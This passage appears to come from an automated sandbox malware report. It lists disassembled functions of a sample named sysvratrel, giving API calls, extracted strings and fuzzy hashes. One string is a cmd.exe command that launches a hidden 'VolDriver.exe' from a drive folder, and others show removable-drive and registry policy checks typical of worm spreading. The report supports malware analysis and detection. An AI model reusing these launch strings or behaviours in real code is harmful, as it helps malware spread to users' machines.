EnterCriticalSection.KERNEL32(00416C40,00000000,0040BB32,006A0266,?,0040BB4E,00000000,0040D2E4,?), ref: 0040600F
memcpy.NTDLL(?,00000000,00000100), ref: 004060A1
CreateFileW.KERNEL32(00416E70,40000000,00000000,00000000,00000002,00000002,00000000), ref: 004061C5
WriteFile.KERNEL32(000000FF,?,?,?,00000000), ref: 00406227
FlushFileBuffers.KERNEL32(000000FF), ref: 00406233
CloseHandle.KERNEL32(000000FF), ref: 0040623D
LeaveCriticalSection.KERNEL32(00416C40,?,?,?,?,?,?,0040BB4E,00000000,0040D2E4,?), ref: 00406248

Memory Dump Source

Source File: 00000005.00000002.2292972194.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2292953351.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2293011892.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sysvratrel.jbxd

Yara matches

Similarity

API ID: File$CriticalSection$BuffersCloseCreateEnterFlushHandleLeaveWritememcpy
String ID:
API String ID: 1457358591-0
Opcode ID: 11af4e60f864a1ee5d179f7b11f5f910824527e1023db5757fbef91574a235bf
Instruction ID: e6130a6dfe54c84fffd3ba92570c30583d1ab1b9d3ba2be6bfb3361b08162579
Opcode Fuzzy Hash: 11af4e60f864a1ee5d179f7b11f5f910824527e1023db5757fbef91574a235bf
Instruction Fuzzy Hash: 9E71C0B4E002099BCB08CF94D885FEFB7B1EB58304F14816DE905BB382D679A951CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040E480 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 112stringCOMMON

Download Yara Rule

APIs

lstrcmpiW.KERNEL32(00000000,device), ref: 0040E53C
lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E58B
SysFreeString.OLEAUT32(00000000), ref: 0040E59F
SysFreeString.OLEAUT32(00000000), ref: 0040E5B7

Strings

device, xrefs: 0040E533
deviceType, xrefs: 0040E546

Memory Dump Source

Source File: 00000005.00000002.2292972194.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2292953351.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2293011892.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sysvratrel.jbxd

Yara matches

Similarity

API ID: FreeStringlstrcmpi
String ID: device$deviceType
API String ID: 1602765415-3511266565
Opcode ID: 39f9f528da6740926d138b1d171382c786ebff15b53edfaaf651e03a90bfcec8
Instruction ID: 3069ab4536640b36b0e12cde36f3ec166fb94fe14c65d0f959ecac372860a23d
Opcode Fuzzy Hash: 39f9f528da6740926d138b1d171382c786ebff15b53edfaaf651e03a90bfcec8
Instruction Fuzzy Hash: 9D411A74A0020AEFDB14CFD5C884BAFB7B5AF48304F108969E505A7390E778EA81CB95

Uniqueness

Uniqueness Score: -1.00%

Function 0040E320 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 112stringCOMMON

Download Yara Rule

APIs

lstrcmpiW.KERNEL32(00000000,service), ref: 0040E3DC
lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E42B
SysFreeString.OLEAUT32(00000000), ref: 0040E43F
SysFreeString.OLEAUT32(00000000), ref: 0040E457

Strings

service, xrefs: 0040E3D3
serviceType, xrefs: 0040E3E6

Memory Dump Source

Source File: 00000005.00000002.2292972194.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2292953351.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2293011892.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sysvratrel.jbxd

Yara matches

Similarity

API ID: FreeStringlstrcmpi
String ID: service$serviceType
API String ID: 1602765415-3667235276
Opcode ID: bf09d843f4898c9c3c4f2d30c91472c51ed62ef352af0ed2c58ac9276ee8b6d4
Instruction ID: 3ee3a309e4cad0d77f423f26d7802281532f5296dcc9ab773efb6af10bc721e7
Opcode Fuzzy Hash: bf09d843f4898c9c3c4f2d30c91472c51ed62ef352af0ed2c58ac9276ee8b6d4
Instruction Fuzzy Hash: 7A413BB5A0020ADFCB04DF99C884FAFB7B5BF48304F108569E504A73A0D778AE85CB95

Uniqueness

Uniqueness Score: -1.00%

Function 004022C0 Relevance: 10.6, APIs: 7, Instructions: 95COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,?,004019BB,00000000), ref: 004022DA
LeaveCriticalSection.KERNEL32(?,?,?,004019BB,00000000), ref: 004022FE

Memory Dump Source

Source File: 00000005.00000002.2292972194.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2292953351.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2293011892.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sysvratrel.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: deb87a967b968b8c04415f7d1b08356640ab07502f924b2abe67f0fdf4d4051f
Instruction ID: a595f2b535375a145ed5326f987dfcc9cad8dea697baa589e2f3a50a699b5d5f
Opcode Fuzzy Hash: deb87a967b968b8c04415f7d1b08356640ab07502f924b2abe67f0fdf4d4051f
Instruction Fuzzy Hash: 2A31E372200215ABC710AFB5ED8CAD7B798FF54314F04463EF54DD3280DB79A4449B99

Uniqueness

Uniqueness Score: -1.00%

Function 00406400 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 94comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0040640B
CoCreateInstance.OLE32(00412768,00000000,00000001,00412748,?), ref: 00406423
wsprintfW.USER32 ref: 00406456

Strings

%windir%\System32\cmd.exe, xrefs: 0040645F
/c start .\%s & start .\%s\VolDriver.exe, xrefs: 0040644A
$h@, xrefs: 00406472, 00406475

Memory Dump Source

Source File: 00000005.00000002.2292972194.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2292953351.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2293011892.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sysvratrel.jbxd

Yara matches

Similarity

API ID: CreateInitializeInstancewsprintf
String ID: $h@$%windir%\System32\cmd.exe$/c start .\%s & start .\%s\VolDriver.exe
API String ID: 2038452267-1952734972
Opcode ID: aa8a32cb6d162733ff770eaad9f94bc5271c9336f419dc8e96cac525845bdcf3
Instruction ID: ff343e69aad13d9306a4779b19c6e3e8efaa2fda419abce3ce5a22e1d679f985
Opcode Fuzzy Hash: aa8a32cb6d162733ff770eaad9f94bc5271c9336f419dc8e96cac525845bdcf3
Instruction Fuzzy Hash: 0631D975A40208EFCB04DF98D885EDEB7B5EF88704F108199E519A73A5CB74AE81CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0040E4C1 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 89stringCOMMON

Download Yara Rule

APIs

lstrcmpiW.KERNEL32(00000000,device), ref: 0040E53C
lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E58B
SysFreeString.OLEAUT32(00000000), ref: 0040E59F
SysFreeString.OLEAUT32(00000000), ref: 0040E5B7

Strings

device, xrefs: 0040E533
deviceType, xrefs: 0040E546

Memory Dump Source

Source File: 00000005.00000002.2292972194.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2292953351.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2293011892.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sysvratrel.jbxd

Yara matches

Similarity

API ID: FreeStringlstrcmpi
String ID: device$deviceType
API String ID: 1602765415-3511266565
Opcode ID: 5397dffdce9bfa1d28fd9043f65dc7fff47123e69829d8d1bf88c428b6381307
Instruction ID: 4edf041377c7e14b34ff85b7b029659f12f4b503add3d656b401b028ce93b30a
Opcode Fuzzy Hash: 5397dffdce9bfa1d28fd9043f65dc7fff47123e69829d8d1bf88c428b6381307
Instruction Fuzzy Hash: AB31DC70A0010AEFDB14CFD5DC84BAFB7B5AF48304F108969E515A7390E778EA45CB95

Uniqueness

Uniqueness Score: -1.00%

Function 0040E361 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 89stringCOMMON

Download Yara Rule

APIs

lstrcmpiW.KERNEL32(00000000,service), ref: 0040E3DC
lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E42B
SysFreeString.OLEAUT32(00000000), ref: 0040E43F
SysFreeString.OLEAUT32(00000000), ref: 0040E457

Strings

service, xrefs: 0040E3D3
serviceType, xrefs: 0040E3E6

Memory Dump Source

Source File: 00000005.00000002.2292972194.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2292953351.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2293011892.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sysvratrel.jbxd

Yara matches

Similarity

API ID: FreeStringlstrcmpi
String ID: service$serviceType
API String ID: 1602765415-3667235276
Opcode ID: f7a49091048d5f2f7edd1107e0f91d764ba8354fbf103c94dbc5479e42702eb7
Instruction ID: ed37c26d591e2f51ed35895ea84be071d11e51b9472e036d4bc20704c2c7b13d
Opcode Fuzzy Hash: f7a49091048d5f2f7edd1107e0f91d764ba8354fbf103c94dbc5479e42702eb7
Instruction Fuzzy Hash: 0E31EAB1A0020ADFCB04DF99D884FAFB7B5BF48304F108569E515B73A0D778AA85CB95

Uniqueness

Uniqueness Score: -1.00%

Function 00407380 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 72sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(000003E8), ref: 00407404
Sleep.KERNEL32(000003E8), ref: 00407433
wsprintfA.USER32 ref: 0040745E
DeleteUrlCacheEntry.WININET(?), ref: 0040746E
Sleep.KERNEL32(000DBBA0), ref: 004074B6

Strings

%s%s, xrefs: 00407452

Memory Dump Source

Source File: 00000005.00000002.2292972194.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2292953351.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2293011892.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sysvratrel.jbxd

Yara matches

Similarity

API ID: Sleep$CacheDeleteEntrywsprintf
String ID: %s%s
API String ID: 1447977647-3252725368
Opcode ID: 588e7e45e4f33f9d0918584f63058166f89edb9a452884b7bd86cb7a942d91ee
Instruction ID: a0bb0d1763f58919fadf504be34b28e9f79e59c8b133fe7279793914b8ec670d
Opcode Fuzzy Hash: 588e7e45e4f33f9d0918584f63058166f89edb9a452884b7bd86cb7a942d91ee
Instruction Fuzzy Hash: 92310AB0D05218EFCB50DF99DC88BDDBBB4FB48304F1085AAE609B6290D7795A84CF59

Uniqueness

Uniqueness Score: -1.00%

Function 00406340 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 55registryCOMMON

Download Yara Rule

APIs

GetLogicalDrives.KERNEL32 ref: 00406346
RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 00406394
RegQueryValueExW.ADVAPI32(?,NoDrives,00000000,00000000,00000000,00000004), ref: 004063C1
RegCloseKey.ADVAPI32(?), ref: 004063DE

Strings

NoDrives, xrefs: 004063B8
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, xrefs: 00406387

Memory Dump Source

Source File: 00000005.00000002.2292972194.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2292953351.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2293011892.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sysvratrel.jbxd

Yara matches

Similarity

API ID: CloseDrivesLogicalOpenQueryValue
String ID: NoDrives$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
API String ID: 2666887985-3471754645
Opcode ID: 46903cfc04ebe2d267c9076d905ed80b260209c2cd6c3f03203de3a9be594a56
Instruction ID: 85ff322c7a95afac5eb7bad71570108e7de378f82f6edd769b1cbb34207a952c
Opcode Fuzzy Hash: 46903cfc04ebe2d267c9076d905ed80b260209c2cd6c3f03203de3a9be594a56
Instruction Fuzzy Hash: 7F11D071E40209DBDB10CFD0D946BEEBBB4FB08704F108159E915B7280D7B8A655CF95

Uniqueness

Uniqueness Score: -1.00%

Function 0040D3A0 Relevance: 9.1, APIs: 6, Instructions: 80threadCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(-00000004,00000000), ref: 0040D3C4

Part of subcall function 0040D490: WaitForSingleObject.KERNEL32(?,00000000), ref: 0040D4D0
Part of subcall function 0040D490: CloseHandle.KERNEL32(?), ref: 0040D4E9

CreateThread.KERNEL32(00000000,?,00000000,?,00000000,?), ref: 0040D41F
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040D45C
GetCurrentProcess.KERNEL32(00000000,00000000), ref: 0040D467
DuplicateHandle.KERNEL32(00000000), ref: 0040D46E
LeaveCriticalSection.KERNEL32(-00000004), ref: 0040D482

Memory Dump Source

Source File: 00000005.00000002.2292972194.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2292953351.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2293011892.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sysvratrel.jbxd

Yara matches

Similarity

API ID: CriticalCurrentHandleProcessSection$CloseCreateDuplicateEnterLeaveObjectSingleThreadWait
String ID:
API String ID: 2251373460-0
Opcode ID: 5fa48f327af51f71990b0ea36d5f90ef72817f248d38badcc5e164c225a1f3f1
Instruction ID: 3905a71daa0159e526e2bdbd6071991b109cebefbf6d86c4cf37b1ecd5ad8e98
Opcode Fuzzy Hash: 5fa48f327af51f71990b0ea36d5f90ef72817f248d38badcc5e164c225a1f3f1
Instruction Fuzzy Hash: F831F8B4A00208EFDB04DF94D889F9EBBB5EB48308F0081A9E945A7390D775AA95CF54

Uniqueness

Uniqueness Score: -1.00%

Function 004090F0 Relevance: 9.1, APIs: 6, Instructions: 60COMMON

Download Yara Rule

APIs

_allshl.NTDLL ref: 004090FD
_aullshr.NTDLL ref: 0040910E
_allshl.NTDLL ref: 00409130
_aullshr.NTDLL ref: 0040914C
_allshl.NTDLL ref: 0040916E
_aullshr.NTDLL ref: 0040918A

Memory Dump Source

Source File: 00000005.00000002.2292972194.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2292953351.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2293011892.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sysvratrel.jbxd

Yara matches

Similarity

API ID: _allshl_aullshr
String ID:
API String ID: 673498613-0
Opcode ID: 9155782f3457772601139595953a0e4fee1c65b8433155f9dc873cd430b809bd
Instruction ID: a69f75a9761dffb427665dfb7b283027f7726bbdceffba7061474d3de6b788b4
Opcode Fuzzy Hash: 9155782f3457772601139595953a0e4fee1c65b8433155f9dc873cd430b809bd
Instruction Fuzzy Hash: 0B111F326005186B8B10EF5EC44268ABBD6EF84361B15C136FC2CDF35AD675D9414BD4

Uniqueness

Uniqueness Score: -1.00%

Function 00401200 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 106networkCOMMON

Download Yara Rule

APIs

memcpy.NTDLL(00000004,00000000,?,?), ref: 00401258
htons.WS2_32(?), ref: 00401281
sendto.WS2_32(?,00000000,?,00000000,?,00000010), ref: 004012A9
InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004012BE

Strings

pdu, xrefs: 0040121D

Memory Dump Source

Source File: 00000005.00000002.2292972194.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2292953351.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2293011892.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sysvratrel.jbxd

Yara matches

Similarity

API ID: ExchangeInterlockedhtonsmemcpysendto
String ID: pdu
API String ID: 2164660128-2320407122
Opcode ID: 91b30ad39cb42ad1c5fa696c873bf215f40042e2e73f1e3bbc8ac8a0414f7340
Instruction ID: 2eaa47314137ae48bc86a2d98b28c98b453a90a93c27253c89cefaff09ddeb80
Opcode Fuzzy Hash: 91b30ad39cb42ad1c5fa696c873bf215f40042e2e73f1e3bbc8ac8a0414f7340
Instruction Fuzzy Hash: 7031B2362083009BC710DF6DD880A9BBBE4AFC9714F04457EFD98A7382D6349914C7AB

Uniqueness

Uniqueness Score: -1.00%

Function 00401820 Relevance: 7.6, APIs: 5, Instructions: 116COMMON

Download Yara Rule

APIs

InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401846
InterlockedDecrement.KERNEL32(?), ref: 004018B1

Part of subcall function 004017A0: EnterCriticalSection.KERNEL32(?,?,?,?,0040186C,?,?), ref: 004017B0
Part of subcall function 004017A0: InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004017C0
Part of subcall function 004017A0: LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 004017CD

Memory Dump Source

Source File: 00000005.00000002.2292972194.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2292953351.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2293011892.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sysvratrel.jbxd

Yara matches

Similarity

API ID: Interlocked$CriticalExchangeSection$DecrementEnterLeave
String ID:
API String ID: 3966618661-0
Opcode ID: 5b1d9706ac0f4861890903663e3aab6c9f99d0d6f1a575e52deddebed6e66e4c
Instruction ID: 99e37592b547e3d1ed5d588db8744cb94e6869326ec40c3cf91f75bef10dfbd8
Opcode Fuzzy Hash: 5b1d9706ac0f4861890903663e3aab6c9f99d0d6f1a575e52deddebed6e66e4c
Instruction Fuzzy Hash: CA41A175604B02ABC718DB39D848797F3A4BF84314F14827EE82D933D1E739A855CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0040ADC0 Relevance: 7.6, APIs: 5, Instructions: 74fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00417490,40000000,00000000,00000000,00000002,00000002,00000000), ref: 0040AE58
WriteFile.KERNEL32(000000FF,00000000,?,?,00000000), ref: 0040AE79
FlushFileBuffers.KERNEL32(000000FF), ref: 0040AE83
CloseHandle.KERNEL32(000000FF), ref: 0040AE8D
InterlockedExchange.KERNEL32(00416068,0000003D), ref: 0040AE9A

Memory Dump Source

Source File: 00000005.00000002.2292972194.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2292953351.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2293011892.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sysvratrel.jbxd

Yara matches

Similarity

API ID: File$BuffersCloseCreateExchangeFlushHandleInterlockedWrite
String ID:
API String ID: 442028454-0
Opcode ID: 357d87ca73b11ea0aaada163076beaff9b4c740b73e671433b9cbd3897c2d74f
Instruction ID: 0da220b8b1f77c32e275edd0b19d3e77d455ccd5d956affd98337f50121a7ab7
Opcode Fuzzy Hash: 357d87ca73b11ea0aaada163076beaff9b4c740b73e671433b9cbd3897c2d74f
Instruction Fuzzy Hash: D5315EB8A40309EBCB14CF98DC45F9EB771FB48300F208569E51567390D774AA51CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00408CD0 Relevance: 7.5, APIs: 5, Instructions: 48COMMON

Download Yara Rule

APIs

_allshl.NTDLL ref: 00408CDE
_allshl.NTDLL ref: 00408CED
_allshl.NTDLL ref: 00408CFC
_allshl.NTDLL ref: 00408D0B
_allshl.NTDLL ref: 00408D1A

Memory Dump Source

Source File: 00000005.00000002.2292972194.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2292953351.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2293011892.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sysvratrel.jbxd

Yara matches

Similarity

API ID: _allshl
String ID:
API String ID: 435966717-0
Opcode ID: e97f6b688e4649d03a543f53d1e87ffd622cab317a47a1f81aa90ba96deec30e
Instruction ID: bcae3434c2129d449cda67bd59c491ccebf17daabcdef2e049336039ec6bac91
Opcode Fuzzy Hash: e97f6b688e4649d03a543f53d1e87ffd622cab317a47a1f81aa90ba96deec30e
Instruction Fuzzy Hash: 3EF03172901428AB9750EEFF85424CBF7E69F98365F218176F81CE3261E9709D0546F2

Uniqueness

Uniqueness Score: -1.00%

Function 00401330 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42synchronizationCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(6856006A,00000000,?,0040143A,00000000,?,?,?,0040D79D,00000000), ref: 00401346
WaitForSingleObject.KERNEL32(00401100,000000FF,?,0040143A,00000000,?,?,?,0040D79D,00000000), ref: 00401352
CloseHandle.KERNEL32(00401100,?,0040143A,00000000,?,?,?,0040D79D,00000000), ref: 0040135C

Part of subcall function 0040A3F0: HeapFree.KERNEL32(?,00000000,00402612,?,00402612,?), ref: 0040A44B

Strings

pdu, xrefs: 00401339

Memory Dump Source

Source File: 00000005.00000002.2292972194.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2292953351.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2293011892.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sysvratrel.jbxd

Yara matches

Similarity

API ID: CloseEventFreeHandleHeapObjectSingleWait
String ID: pdu
API String ID: 309973729-2320407122
Opcode ID: e0f329f12d2259528821c27011c0918a976d96f57bacaacdd1962e62a77ab920
Instruction ID: d174ec339e303b727d6f690e0c81bd26c44cc0430c196550e953614590448db6
Opcode Fuzzy Hash: e0f329f12d2259528821c27011c0918a976d96f57bacaacdd1962e62a77ab920
Instruction Fuzzy Hash: 0C01D6765003009BCB249F55ECC0D9B7769AF49311704467AFC05AB396C638E8508775

Uniqueness

Uniqueness Score: -1.00%

Function 004062C0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

GetDriveTypeW.KERNEL32(0040629F), ref: 004062CD
QueryDosDeviceW.KERNEL32(0040629F,?,00000208), ref: 0040630C
StrCmpNW.SHLWAPI(?,\??\,00000004), ref: 00406324

Strings

\??\, xrefs: 00406318

Memory Dump Source

Source File: 00000005.00000002.2292972194.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2292953351.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2293011892.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sysvratrel.jbxd

Yara matches

Similarity

API ID: DeviceDriveQueryType
String ID: \??\
API String ID: 1681518211-3047946824
Opcode ID: 1f4486d3417c416fbe6947eda0d50e0154391f7c0caa962a9d661e7b197f6568
Instruction ID: fe1cba3e8f96ca8ec28924db8accccc61f2e919e988f9d14e04ecf4ac666ff3a
Opcode Fuzzy Hash: 1f4486d3417c416fbe6947eda0d50e0154391f7c0caa962a9d661e7b197f6568
Instruction Fuzzy Hash: 1901FFB0A4021CEBCB20DF55DD49BDAB7B4AB04704F00C0BAAA05A7280E6759ED5DF9C

Uniqueness

Uniqueness Score: -1.00%

Function 0040E9B0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 28fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(`k@,80000000,00000001,00000000,00000003,00000000,00000000,00406B60), ref: 0040E9D0
GetFileSize.KERNEL32(000000FF,00000000), ref: 0040E9E5
CloseHandle.KERNEL32(000000FF), ref: 0040E9F2

Strings

`k@, xrefs: 0040E9CC, 0040E9CF

Memory Dump Source

Source File: 00000005.00000002.2292972194.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2292953351.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2293011892.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sysvratrel.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleSize
String ID: `k@
API String ID: 1378416451-1195631054
Opcode ID: df23a932ebc1e553a736a6907ae04855c01650ef694a25ef55576e6386c5cc64
Instruction ID: 241503f102ff988800a1529ff4214dfa730f02490b079578101ca7fb38dafef3
Opcode Fuzzy Hash: df23a932ebc1e553a736a6907ae04855c01650ef694a25ef55576e6386c5cc64
Instruction Fuzzy Hash: F7F01C74A40308FBDB20DFA4DC49B8DBBB4AB04701F208295FA04BB2D0D6B56A908B44

Uniqueness

Uniqueness Score: -1.00%

Function 00401100 Relevance: 6.1, APIs: 4, Instructions: 86synchronizationCOMMON

Download Yara Rule

APIs

ioctlsocket.WS2_32 ref: 0040112B
recvfrom.WS2_32 ref: 0040119C
InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004011B2
WaitForSingleObject.KERNEL32(?,00000001), ref: 004011D3

Memory Dump Source

Source File: 00000005.00000002.2292972194.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2292953351.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2293011892.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sysvratrel.jbxd

Yara matches

Similarity

API ID: ExchangeInterlockedObjectSingleWaitioctlsocketrecvfrom
String ID:
API String ID: 3980219359-0
Opcode ID: 7cf137ea0161487f7737358bd29a50fac6b28174b756953d330c0cbf6919b593
